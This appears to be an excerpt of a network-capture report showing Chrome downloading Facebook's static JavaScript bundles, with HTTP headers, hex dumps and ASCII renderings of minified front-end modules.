                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC581OUTGET /rsrc.php/v3/yg/r/5VtnQAqNe99.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC1945INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: pvgShi+mxFj+MB0MDiof2A==
                                                                                                                                                                                                                                Expires: Sun, 28 Sep 2025 06:00:29 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: CMYBJYGUCZ05o+ktQT48Ywf2su4EyrDjvxYt3pIRu78BB2YBn+fFpOUKi/Wo8zXXAZq4OUmdDLOKxDliCUgPDw==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:20 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=6, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 176168
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC15870INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 41 63 74 6f 72 55 52 49 43 6f 6e 66 69 67 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 61 3d 4f 62 6a 65 63 74 2e 66 72 65 65 7a 65 28 7b 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 3a 22 61 76 22 2c 45 4e 43 52 59 50 54 45 44 5f 50 41 52 41 4d 45 54 45 52 5f 41 43 54 4f 52 3a 22 65 61 76 22 7d 29 3b 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 42 61 6e 7a 61 69 4c 6f 67 67 65 72 22 2c 5b 22 63 72 3a 39 39 38 39 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 61 29 7b 72 65 74 75 72 6e 7b 6c 6f 67 3a 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 62
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("ActorURIConfig",[],(function(a,b,c,d,e,f){a=Object.freeze({PARAMETER_ACTOR:"av",ENCRYPTED_PARAMETER_ACTOR:"eav"});f["default"]=a}),66);__d("BanzaiLogger",["cr:9989"],(function(a,b,c,d,e,f,g){function h(a){return{log:function(c,d){b
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC16384INData Raw: 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 22 2c 22 64 69 73 61 62 6c 65 64 2d 69 63 6f 6e 22 3a 22 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 22 2c 22 64 69 73 61 62 6c 65 64 2d 74 65 78 74 22 3a 22 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 22 2c 64 69 76 69 64 65 72 3a 22 23 33 45 34 30 34 32 22 2c 22 65 76 65 6e 74 2d 64 61 74 65 22 3a 22 23 46 33 34 32 35 46 22 2c 22 66 62 2d 77 6f 72 64 6d 61 72 6b 22 3a 22 23 46 46 46 46 46 46 22 2c 22 66 62 2d 6c 6f 67 6f 22 3a 22 23 30 38 36 36 46 46 22 2c 22 66 69 6c 74 65 72 2d 61 63 63 65 6e 74 22 3a 22 69 6e 76 65 72 74 28 34 30 25 29 20 73 65 70 69 61 28 35 32 25 29 20 73 61 74 75 72 61 74 65 28 32 30 30 25 29 20 73 61 74 75 72 61
                                                                                                                                                                                                                                Data Ascii: a(255, 255, 255, 0.3)","disabled-icon":"rgba(255, 255, 255, 0.3)","disabled-text":"rgba(255, 255, 255, 0.3)",divider:"#3E4042","event-date":"#F3425F","fb-wordmark":"#FFFFFF","fb-logo":"#0866FF","filter-accent":"invert(40%) sepia(52%) saturate(200%) satura
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC16384INData Raw: 65 6e 2d 73 65 63 6f 6e 64 61 72 79 22 3a 22 72 67 62 28 32 32 37 2c 32 35 30 2c 32 32 34 29 22 2c 22 67 72 65 65 6e 2d 74 65 72 74 69 61 72 79 22 3a 22 72 67 62 28 32 36 2c 36 38 2c 32 37 29 22 2c 22 6d 61 67 65 6e 74 61 2d 70 72 69 6d 61 72 79 22 3a 22 72 67 62 28 32 31 35 2c 37 37 2c 32 30 34 29 22 2c 22 6d 61 67 65 6e 74 61 2d 73 65 63 6f 6e 64 61 72 79 22 3a 22 72 67 62 28 32 35 35 2c 32 33 39 2c 32 35 34 29 22 2c 22 6d 61 67 65 6e 74 61 2d 74 65 72 74 69 61 72 79 22 3a 22 72 67 62 28 39 36 2c 33 36 2c 39 31 29 22 2c 22 6f 72 61 6e 67 65 2d 70 72 69 6d 61 72 79 22 3a 22 72 67 62 28 32 30 38 2c 31 30 38 2c 32 30 29 22 2c 22 6f 72 61 6e 67 65 2d 73 65 63 6f 6e 64 61 72 79 22 3a 22 72 67 62 28 32 35 35 2c 32 34 31 2c 32 33 39 29 22 2c 22 6f 72 61 6e 67
                                                                                                                                                                                                                                Data Ascii: en-secondary":"rgb(227,250,224)","green-tertiary":"rgb(26,68,27)","magenta-primary":"rgb(215,77,204)","magenta-secondary":"rgb(255,239,254)","magenta-tertiary":"rgb(96,36,91)","orange-primary":"rgb(208,108,20)","orange-secondary":"rgb(255,241,239)","orang
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC16384INData Raw: 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 2c 20 30 2c 20 30 2e 31 2c 20 31 29 22 2c 22 66 64 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 70 61 73 73 69 76 65 2d 6d 6f 76 65 2d 6f 75 74 22 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 2c 20 30 2c 20 30 2e 31 2c 20 31 29 22 2c 22 66 64 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 71 75 69 63 6b 2d 6d 6f 76 65 2d 69 6e 22 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 2c 20 30 2e 39 2c 20 30 2e 32 2c 20 31 29 22 2c 22 66 64 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 71 75 69 63 6b 2d 6d 6f 76 65 2d 6f 75 74 22 3a 22 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 2c 20 30 2e 39 2c 20 30 2e 32 2c 20 31 29 22 2c 22 66 64 73 2d 61 6e 69 6d 61 74 69 6f 6e 2d 66 61 64 65 2d 69 6e 22 3a 22 63 75 62 69 63 2d 62 65 7a 69 65
                                                                                                                                                                                                                                Data Ascii: bic-bezier(0.5, 0, 0.1, 1)","fds-animation-passive-move-out":"cubic-bezier(0.5, 0, 0.1, 1)","fds-animation-quick-move-in":"cubic-bezier(0.1, 0.9, 0.2, 1)","fds-animation-quick-move-out":"cubic-bezier(0.1, 0.9, 0.2, 1)","fds-animation-fade-in":"cubic-bezie
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC1500INData Raw: 6e 63 65 28 29 3d 3d 3d 33 29 72 65 74 75 72 6e 21 30 3b 65 26 26 62 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 69 66 28 66 2e 74 72 69 67 67 65 72 4f 6e 52 65 70 65 61 74 73 3d 3d 3d 21 31 26 26 62 2e 72 65 70 65 61 74 3d 3d 3d 21 30 29 72 65 74 75 72 6e 21 31 3b 69 66 28 65 21 3d 6e 75 6c 6c 29 7b 69 66 28 66 2e 63 6f 6d 6d 61 6e 64 21 3d 6e 75 6c 6c 26 26 73 28 62 2e 74 61 72 67 65 74 2c 66 29 26 26 67 2e 67 65 74 4d 6f 64 69 66 69 65 64 4b 65 79 62 6f 61 72 64 53 68 6f 72 74 63 75 74 73 50 72 65 66 65 72 65 6e 63 65 28 29 3d 3d 3d 34 29 7b 77 2e 63 75 72 72 65 6e 74 28 66 2e 63 6f 6d 6d 61 6e 64 2c 66 2e 73 69 6e 67 6c 65 43 68 61 72 44 65 73 63 72 69 70 74 69 6f 6e 29 3b 72 65 74 75 72 6e 21 30 7d 68 3d 67 26 26 67 2e 67 65 74 41 72 65 53
                                                                                                                                                                                                                                Data Ascii: nce()===3)return!0;e&&b.preventDefault()}if(f.triggerOnRepeats===!1&&b.repeat===!0)return!1;if(e!=null){if(f.command!=null&&s(b.target,f)&&g.getModifiedKeyboardShortcutsPreference()===4){w.current(f.command,f.singleCharDescription);return!0}h=g&&g.getAreS
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC14884INData Raw: 43 6f 6d 6d 61 6e 64 43 6f 6e 74 65 78 74 22 29 2e 50 72 6f 76 69 64 65 72 2c 7b 76 61 6c 75 65 3a 7a 2c 63 68 69 6c 64 72 65 6e 3a 42 7d 29 7d 64 2e 64 69 73 70 6c 61 79 4e 61 6d 65 3d 64 2e 6e 61 6d 65 2b 22 20 5b 66 72 6f 6d 20 22 2b 66 2e 69 64 2b 22 5d 22 3b 72 65 74 75 72 6e 20 64 7d 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 63 72 65 61 74 65 4b 65 79 43 6f 6d 6d 61 6e 64 57 69 64 67 65 74 22 2c 5b 22 63 72 65 61 74 65 4b 65 79 43 6f 6d 6d 61 6e 64 57 72 61 70 70 65 72 22 2c 22 72 65 61 63 74 22 2c 22 72 65 63 6f 76 65 72 61 62 6c 65 56 69 6f 6c 61 74 69 6f 6e 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 68 2c 69 3d 68 7c
                                                                                                                                                                                                                                Data Ascii: CommandContext").Provider,{value:z,children:B})}d.displayName=d.name+" [from "+f.id+"]";return d}g["default"]=a}),98);__d("createKeyCommandWidget",["createKeyCommandWrapper","react","recoverableViolation"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h|
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC16384INData Raw: 26 28 69 7c 7c 28 69 3d 63 28 22 73 75 73 70 65 6e 64 4f 72 54 68 72 6f 77 49 66 55 73 65 64 49 6e 53 53 52 22 29 29 29 28 22 4c 6f 61 64 69 6e 67 20 6f 66 20 62 6f 6f 74 6c 6f 61 64 65 64 20 61 6e 64 20 54 33 20 63 6f 6d 70 6f 6e 65 6e 74 73 20 69 73 20 64 69 73 61 62 6c 65 64 20 64 75 72 69 6e 67 20 53 53 52 22 29 3b 76 61 72 20 64 3d 62 2e 67 65 74 4d 6f 64 75 6c 65 49 64 28 29 3b 69 66 28 21 6a 5b 64 5d 29 7b 62 3d 6a 5b 64 5d 3d 62 2e 6c 6f 61 64 28 29 3b 62 5b 22 66 69 6e 61 6c 6c 79 22 5d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 6c 65 74 65 20 6a 5b 64 5d 7d 29 7d 74 68 72 6f 77 20 6a 5b 64 5d 7d 72 65 74 75 72 6e 20 61 7d 67 2e 70 72 65 6c 6f 61 64 3d 61 3b 67 2e 72 65 61 64 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 43 50 55 50 72 65 73 73 75
                                                                                                                                                                                                                                Data Ascii: &(i||(i=c("suspendOrThrowIfUsedInSSR")))("Loading of bootloaded and T3 components is disabled during SSR");var d=b.getModuleId();if(!j[d]){b=j[d]=b.load();b["finally"](function(){delete j[d]})}throw j[d]}return a}g.preload=a;g.read=b}),98);__d("CPUPressu
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC16384INData Raw: 3b 0a 5f 5f 64 28 22 4d 65 6d 6f 72 79 55 74 69 6c 73 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 67 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6d 65 6d 6f 72 79 7d 66 75 6e 63 74 69 6f 6e 20 68 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 26 26 77 69 6e 64 6f 77 2e 6e 61 76 69 67 61 74 6f 72 2e 64 65 76 69 63 65 4d 65 6d 6f 72 79 7d 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61
                                                                                                                                                                                                                                Data Ascii: ;__d("MemoryUtils",[],(function(a,b,c,d,e,f){"use strict";function g(){return window.performance&&window.performance.memory}function h(){return window.navigator&&window.navigator.deviceMemory}function a(){return window.performance&&typeof window.performa
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC14884INData Raw: 6c 6c 26 26 28 63 28 22 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 22 29 28 6c 29 2c 6c 3d 6e 75 6c 6c 29 2c 6d 28 61 2c 62 29 7d 66 75 6e 63 74 69 6f 6e 20 71 28 61 2c 62 29 7b 69 66 28 21 64 28 22 56 69 73 69 62 69 6c 69 74 79 41 50 49 22 29 2e 69 73 56 69 73 69 62 69 6c 69 74 79 48 69 64 64 65 6e 28 29 26 26 6f 29 7b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 6f 3b 62 26 26 28 6b 3d 7b 61 66 66 65 63 74 65 64 49 6e 74 65 72 61 63 74 69 6f 6e 73 3a 5b 5d 2c 6d 65 74 72 69 63 73 3a 63 28 22 4f 6e 65 54 72 61 63 65 43 6f 72 65 22 29 2e 73 74 61 72 74 54 72 61 63 65 28 63 28 22 75 75 69 64 76 34 22 29 28 29 2c 61 2c 22 52 45 53 50 4f 4e 53 49 56 45 4e 45 53 53 22 2c 63 28 22 70 65 72 66 6f 72 6d 61 6e 63 65 4e 6f 77 53 69 6e 63 65 41
                                                                                                                                                                                                                                Data Ascii: ll&&(c("clearInterval")(l),l=null),m(a,b)}function q(a,b){if(!d("VisibilityAPI").isVisibilityHidden()&&o){var e=function(){var b=o;b&&(k={affectedInteractions:[],metrics:c("OneTraceCore").startTrace(c("uuidv4")(),a,"RESPONSIVENESS",c("performanceNowSinceA


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                35192.168.2.449786157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC581OUTGET /rsrc.php/v3/ys/r/pg8jih5T_9q.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: S/RW7UT0dsoYKhdDMbB2ng==
                                                                                                                                                                                                                                Expires: Thu, 25 Sep 2025 17:38:33 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: g244AvYtfnioKAF+7uAL2Q9CFPpwoNPDOeesv6fRC5gxiZpox4Ghfa8DYaSIBf0u/0ngDbLzgQLHWYaYFYdRSg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:20 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=88, rtx=0, c=14, mss=1392, tbw=3412, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 17188
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC16384INData Raw: 2f 2a 46 42 5f 50 4b 47 5f 44 45 4c 49 4d 2a 2f 0a 0a 5f 5f 64 28 22 63 73 78 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 63 73 78 3a 20 55 6e 65 78 70 65 63 74 65 64 20 63 6c 61 73 73 20 73 65 6c 65 63 74 6f 72 20 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 2e 22 29 7d 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 67 65 74 4f 72 43 72 65 61 74 65 44 4f 4d 49 44 22 2c 5b 22 75 6e 69 71 75 65 49 44 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 2c 67 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 61 2e 69 64 7c 7c 28 61 2e 69 64 3d 63 28 22 75 6e 69 71 75 65 49 44 22
                                                                                                                                                                                                                                Data Ascii: /*FB_PKG_DELIM*/__d("csx",[],(function(a,b,c,d,e,f){function a(a){throw new Error("csx: Unexpected class selector transformation.")}f["default"]=a}),66);__d("getOrCreateDOMID",["uniqueID"],(function(a,b,c,d,e,f,g){function a(a){a.id||(a.id=c("uniqueID"
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC803INData Raw: 67 22 26 26 28 61 3d 63 28 22 24 22 29 28 61 29 29 3b 72 65 74 75 72 6e 20 63 28 22 53 74 79 6c 65 43 6f 72 65 22 29 2e 67 65 74 46 6c 6f 61 74 28 61 2c 62 29 7d 7d 29 3b 62 3d 61 3b 67 5b 22 64 65 66 61 75 6c 74 22 5d 3d 62 7d 29 2c 39 38 29 3b 0a 5f 5f 64 28 22 63 73 73 56 61 72 22 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 2c 66 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 61 29 7b 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 27 63 73 73 56 61 72 28 22 27 2b 61 2b 27 22 29 3a 20 55 6e 65 78 70 65 63 74 65 64 20 63 6c 61 73 73 20 74 72 61 6e 73 66 6f 72 6d 61 74 69 6f 6e 2e 27 29 7d 66 5b 22 64 65 66 61 75 6c 74 22 5d 3d 61 7d 29 2c 36 36 29 3b 0a 5f 5f 64 28 22 73 65 74 49 6d 6d 65 64 69 61 74 65 22 2c 5b 22 54 69 6d 65 53 6c 69
                                                                                                                                                                                                                                Data Ascii: g"&&(a=c("$")(a));return c("StyleCore").getFloat(a,b)}});b=a;g["default"]=b}),98);__d("cssVar",[],(function(a,b,c,d,e,f){function a(a){throw new Error('cssVar("'+a+'"): Unexpected class transformation.')}f["default"]=a}),66);__d("setImmediate",["TimeSli


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                36192.168.2.449785157.240.251.94432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC581OUTGET /rsrc.php/v3/yn/r/BTuEBPL3Mnd.js HTTP/1.1
                                                                                                                                                                                                                                Host: static.xx.fbcdn.net
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                Origin: https://www.facebook.com
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                Referer: https://www.facebook.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC1944INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                                                                                                                Last-Modified: Mon, 01 Jan 2001 08:00:00 GMT
                                                                                                                                                                                                                                content-md5: SSGtfbAxBhRkHRMbiDwz5Q==
                                                                                                                                                                                                                                Expires: Fri, 19 Sep 2025 18:36:39 GMT
                                                                                                                                                                                                                                Cache-Control: public,max-age=31536000,immutable
                                                                                                                                                                                                                                report-to: {"max_age":21600,"endpoints":[{"url":"https:\/\/www.xx.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                                                                document-policy: force-load-at-top
                                                                                                                                                                                                                                permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewport-width=(), ch-width=(), clipboard-read=(), clipboard-write=(), compute-pressure=(), display-capture=(), encrypted-media=(), fullscreen=(self), gamepad=(), geolocation=(), gyroscope=(), hid=(), idle-detection=(), interest-cohort=(), keyboard-map=(), local-fonts=(), magnetometer=(), microphone=(), midi=(), otp-credentials=(), payment=(), picture-in-picture=(), private-state-token-issuance=(), publickey-credentials-get=(), screen-wake-lock=(), serial=(), shared-storage=(), shared-storage-select-url=(), private-state-token-redemption=(), usb=(), unload=(self), window-management=(), xr-spatial-tracking=();report-to="permissions_policy"
                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                reporting-endpoints: permissions_policy="https://www.xx.facebook.com/ajax/browser_error_reports/"
                                                                                                                                                                                                                                origin-agent-cluster: ?1
                                                                                                                                                                                                                                X-FB-Debug: 3wzH705W1PMpnv1HovhTOTAhWpHk9v0oapXUD6O5hAXT+mVfMnHDiMV2p45JxpNNFWfUb+A7wySoSb6GHu0Alg==
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:20 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://www.facebook.com
                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                X-FB-Connection-Quality: GOOD; q=0.7, rtt=89, rtx=0, c=14, mss=1392, tbw=3413, tp=-1, tpl=-1, uplat=0, ullat=-1
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 24223
                                                                                                                                                                                                                                2024-09-29 04:54:20 UTC1INData Raw: 3b
                                                                                                                                                                                                                                Data Ascii: ;
